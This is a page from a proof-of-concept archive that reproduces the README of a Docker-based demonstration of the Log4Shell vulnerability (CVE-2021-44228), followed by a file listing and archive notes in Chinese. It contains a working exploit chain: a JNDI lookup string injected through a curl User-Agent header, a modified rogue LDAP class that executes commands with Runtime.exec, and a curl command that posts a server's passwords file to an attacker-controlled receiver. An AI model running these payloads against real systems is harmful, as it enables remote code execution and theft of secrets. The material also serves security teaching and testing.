关联漏洞
介绍
# CVE-2021-44228-docker-example
A simple demonstration of CVE-2021-44228 to transfer data from a vulnerable server to a web service controlled by an attacker.
All components involved are running via Docker.
## Components
### vulnerable-server
This is a standard Java server acting as the victim. It's running:
- Java `8u111`
- Web Application (Spring Boot 2.6.1)
- Log4J
**This server is `VULNERABLE` using this configuration.**
Additional Information:
- endpoint at `/logging` (GET) will log the user agent using Log4J
- `/foo/passwords.txt` exists (the attackers target)
Content of `passwords.txt`:
```text
my secret
```
### malicious-receiver
This is a standard Java server acting as the data collector of the attacker. It's running:
- Java `17`
- Web Application (Spring Boot 2.6.1)
Additional information:
- endpoint at `receiver` (POST) will log the request body
### malicious-ldap
This is an LDAP server powered by [rogue-jndi](https://github.com/veracode-research/rogue-jndi).
Its `ExportJava` class has been modified so that commands passed via the `-c` flag get executed.
```java
public ExportObject() {
try {
Runtime.getRuntime().exec(Config.command);
} catch(Exception e) {
e.printStackTrace();
}
}
```
When requested by the vulnerable server it will respond with a class running the following command when instantiated:
```shell
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt
```
This will effectively post the content of `/foo/passwords.txt` to the malicious receiver's prepared endpoint.
## Usage
1. setup Docker images by running:
```shell
./build.sh
```
2. start component containers by running:
```shell
./start.sh
```
3. trigger the vulnerability by running:
```shell
curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
```
4. check the logging output of the malicious receiver component by running:
```shell
docker logs --timestamps docker_malicious-receiver_1
```
There should be the content of the server's `passwords.txt` file.
5. stop component containers by running:
```shell
./stop.sh
```
文件快照
[4.0K] /data/pocs/56c218318accd7296ac2e89132d32829bf10e6aa
├── [ 429] build.sh
├── [4.0K] docker
│ ├── [ 884] docker-compose.yml
│ ├── [4.0K] ldap
│ │ ├── [ 180] ldap.Dockerfile
│ │ ├── [ 11M] RogueJndi-1.1.jar
│ │ └── [ 170] start.sh
│ ├── [ 130] receiver.Dockerfile
│ └── [ 170] server.Dockerfile
├── [ 703] pom.xml
├── [2.1K] README.md
├── [4.0K] receiver
│ ├── [ 11K] cve-2021-44228-evil-receiver.iml
│ ├── [1.6K] pom.xml
│ └── [4.0K] src
│ └── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] foo
│ │ └── [4.0K] bar
│ │ └── [4.0K] cve202144228evilreceiver
│ │ ├── [4.0K] api
│ │ │ └── [ 668] ReceiveEndpoint.java
│ │ └── [ 361] Cve202144228EvilReceiverApplication.java
│ └── [4.0K] resources
│ └── [ 21] application.yml
├── [4.0K] server
│ ├── [ 12K] cve-2021-44228-server.iml
│ ├── [1.9K] pom.xml
│ └── [4.0K] src
│ └── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] foo
│ │ └── [4.0K] bar
│ │ └── [4.0K] cve202144228server
│ │ ├── [4.0K] api
│ │ │ └── [ 773] LogEndpoint.java
│ │ └── [ 343] Cve202144228ServerApplication.java
│ └── [4.0K] resources
│ └── [ 21] application.yaml
├── [ 150] start.sh
└── [ 149] stop.sh
20 directories, 21 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。